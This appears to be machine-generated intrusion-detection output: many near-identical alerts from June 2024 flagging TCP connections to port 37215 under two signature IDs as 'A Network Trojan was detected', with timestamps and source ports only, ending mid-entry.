              Timestamp:06/13/24-21:32:32.170746
              SID:2835222
              Source Port:32896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359079
              SID:2829579
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075114
              SID:2835222
              Source Port:58404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307683
              SID:2829579
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210776
              SID:2829579
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487399
              SID:2835222
              Source Port:40828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091969
              SID:2835222
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174048
              SID:2835222
              Source Port:49562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508214
              SID:2835222
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933012
              SID:2829579
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356208
              SID:2835222
              Source Port:42020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550169
              SID:2829579
              Source Port:34072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509522
              SID:2829579
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405150
              SID:2829579
              Source Port:60136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091236
              SID:2829579
              Source Port:55930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370201
              SID:2835222
              Source Port:51314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756663
              SID:2835222
              Source Port:38084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359254
              SID:2835222
              Source Port:40846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628959
              SID:2829579
              Source Port:39016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439365
              SID:2829579
              Source Port:39604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152697
              SID:2829579
              Source Port:43916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707173
              SID:2829579
              Source Port:57040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012792
              SID:2829579
              Source Port:39470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546356
              SID:2835222
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175137
              SID:2835222
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133999
              SID:2835222
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093976
              SID:2829579
              Source Port:33304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614938
              SID:2829579
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371308
              SID:2835222
              Source Port:57938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544958
              SID:2835222
              Source Port:37472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165717
              SID:2835222
              Source Port:54370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833504
              SID:2835222
              Source Port:54564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194283
              SID:2835222
              Source Port:50322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725272
              SID:2829579
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910306
              SID:2829579
              Source Port:38082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175608
              SID:2835222
              Source Port:52028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992549
              SID:2829579
              Source Port:53980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175345
              SID:2829579
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638269
              SID:2835222
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550943
              SID:2835222
              Source Port:52984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556321
              SID:2835222
              Source Port:58756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110789
              SID:2835222
              Source Port:50384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422916
              SID:2835222
              Source Port:56190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087876
              SID:2835222
              Source Port:58256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781977
              SID:2829579
              Source Port:45352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553379
              SID:2835222
              Source Port:59748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244567
              SID:2829579
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192914
              SID:2835222
              Source Port:39536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606636
              SID:2835222
              Source Port:47208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407303
              SID:2829579
              Source Port:59620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991948
              SID:2829579
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820695
              SID:2835222
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936429
              SID:2829579
              Source Port:34256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544420
              SID:2829579
              Source Port:42224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671251
              SID:2835222
              Source Port:58958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610618
              SID:2835222
              Source Port:56220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095545
              SID:2835222
              Source Port:45714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485195
              SID:2829579
              Source Port:56192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094092
              SID:2835222
              Source Port:38582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221328
              SID:2835222
              Source Port:39622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404294
              SID:2835222
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913576
              SID:2829579
              Source Port:35596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269095
              SID:2835222
              Source Port:33938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348353
              SID:2835222
              Source Port:41094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941392
              SID:2835222
              Source Port:42174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299168
              SID:2829579
              Source Port:58700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252880
              SID:2829579
              Source Port:36880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275874
              SID:2829579
              Source Port:59534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605962
              SID:2835222
              Source Port:42070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418149
              SID:2835222
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727971
              SID:2829579
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339640
              SID:2835222
              Source Port:40946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505366
              SID:2835222
              Source Port:57408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507688
              SID:2829579
              Source Port:45064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214469
              SID:2829579
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509979
              SID:2829579
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027594
              SID:2829579
              Source Port:47034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504214
              SID:2835222
              Source Port:57224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041655
              SID:2829579
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155229
              SID:2829579
              Source Port:60380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710760
              SID:2835222
              Source Port:40084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656650
              SID:2835222
              Source Port:46068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552256
              SID:2835222
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936631
              SID:2835222
              Source Port:47452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160705
              SID:2835222
              Source Port:54232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607571
              SID:2835222
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093787
              SID:2829579
              Source Port:41756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528245
              SID:2829579
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871835
              SID:2835222
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042067
              SID:2829579
              Source Port:52310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316572
              SID:2829579
              Source Port:49408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295028
              SID:2835222
              Source Port:47708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555014
              SID:2835222
              Source Port:36294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308873
              SID:2829579
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042441
              SID:2829579
              Source Port:33350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213704
              SID:2829579
              Source Port:52464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835632
              SID:2835222
              Source Port:33170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356123
              SID:2829579
              Source Port:37856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270691
              SID:2835222
              Source Port:58816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785128
              SID:2835222
              Source Port:41406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669770
              SID:2829579
              Source Port:48032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729323
              SID:2835222
              Source Port:42198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656806
              SID:2835222
              Source Port:35858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455133
              SID:2829579
              Source Port:45614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212245
              SID:2829579
              Source Port:49956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613828
              SID:2829579
              Source Port:58002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090544
              SID:2835222
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436801
              SID:2829579
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573054
              SID:2829579
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451450
              SID:2835222
              Source Port:55858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220987
              SID:2829579
              Source Port:58530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670336
              SID:2835222
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457630
              SID:2835222
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077737
              SID:2829579
              Source Port:48568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.241743
              SID:2829579
              Source Port:57196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174606
              SID:2835222
              Source Port:36048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246086
              SID:2829579
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200056
              SID:2835222
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552681
              SID:2835222
              Source Port:55792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993726
              SID:2835222
              Source Port:46816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043074
              SID:2835222
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707879
              SID:2835222
              Source Port:50558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253652
              SID:2835222
              Source Port:34792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565335
              SID:2835222
              Source Port:49142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524810
              SID:2829579
              Source Port:40422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159923
              SID:2835222
              Source Port:37982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127272
              SID:2835222
              Source Port:38212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479965
              SID:2835222
              Source Port:53218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402208
              SID:2835222
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042422
              SID:2835222
              Source Port:47218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415987
              SID:2835222
              Source Port:33524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728502
              SID:2829579
              Source Port:34910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631305
              SID:2829579
              Source Port:57928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176315
              SID:2835222
              Source Port:39382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376911
              SID:2835222
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378269
              SID:2835222
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676637
              SID:2835222
              Source Port:55050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374931
              SID:2829579
              Source Port:53752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150371
              SID:2835222
              Source Port:47100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213129
              SID:2829579
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824012
              SID:2835222
              Source Port:51914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824451
              SID:2829579
              Source Port:57256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695425
              SID:2829579
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124854
              SID:2829579
              Source Port:37518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800741
              SID:2835222
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199561
              SID:2835222
              Source Port:50138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440087
              SID:2835222
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823665
              SID:2835222
              Source Port:37434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786520
              SID:2829579
              Source Port:34854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608950
              SID:2835222
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253316
              SID:2835222
              Source Port:38028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420337
              SID:2829579
              Source Port:59886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232108
              SID:2829579
              Source Port:44798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124408
              SID:2829579
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093206
              SID:2835222
              Source Port:50048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343972
              SID:2835222
              Source Port:49808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127494
              SID:2835222
              Source Port:36442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093816
              SID:2829579
              Source Port:37254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374411
              SID:2829579
              Source Port:60930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.986642
              SID:2829579
              Source Port:34932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783737
              SID:2835222
              Source Port:45178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309362
              SID:2835222
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977587
              SID:2829579
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357839
              SID:2835222
              Source Port:48798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630371
              SID:2835222
              Source Port:42176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.061068
              SID:2829579
              Source Port:40754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866369
              SID:2829579
              Source Port:37290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252558
              SID:2835222
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547119
              SID:2829579
              Source Port:44168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936823
              SID:2829579
              Source Port:50058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731506
              SID:2829579
              Source Port:49386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930821
              SID:2835222
              Source Port:46824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456688
              SID:2829579
              Source Port:37238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306176
              SID:2829579
              Source Port:52744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124452
              SID:2829579
              Source Port:52466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219925
              SID:2829579
              Source Port:43378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782311
              SID:2829579
              Source Port:41210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045092
              SID:2835222
              Source Port:48144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457242
              SID:2829579
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131802
              SID:2835222
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614485
              SID:2835222
              Source Port:43608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629888
              SID:2829579
              Source Port:45332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212712
              SID:2829579
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418042
              SID:2835222
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274762
              SID:2829579
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801448
              SID:2835222
              Source Port:60040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971104
              SID:2835222
              Source Port:51024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247054
              SID:2829579
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731117
              SID:2829579
              Source Port:41358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975424
              SID:2835222
              Source Port:59176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978659
              SID:2835222
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451151
              SID:2835222
              Source Port:39698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843829
              SID:2829579
              Source Port:58994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302422
              SID:2829579
              Source Port:58770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090061
              SID:2835222
              Source Port:35226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100303
              SID:2829579
              Source Port:36086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615164
              SID:2829579
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404371
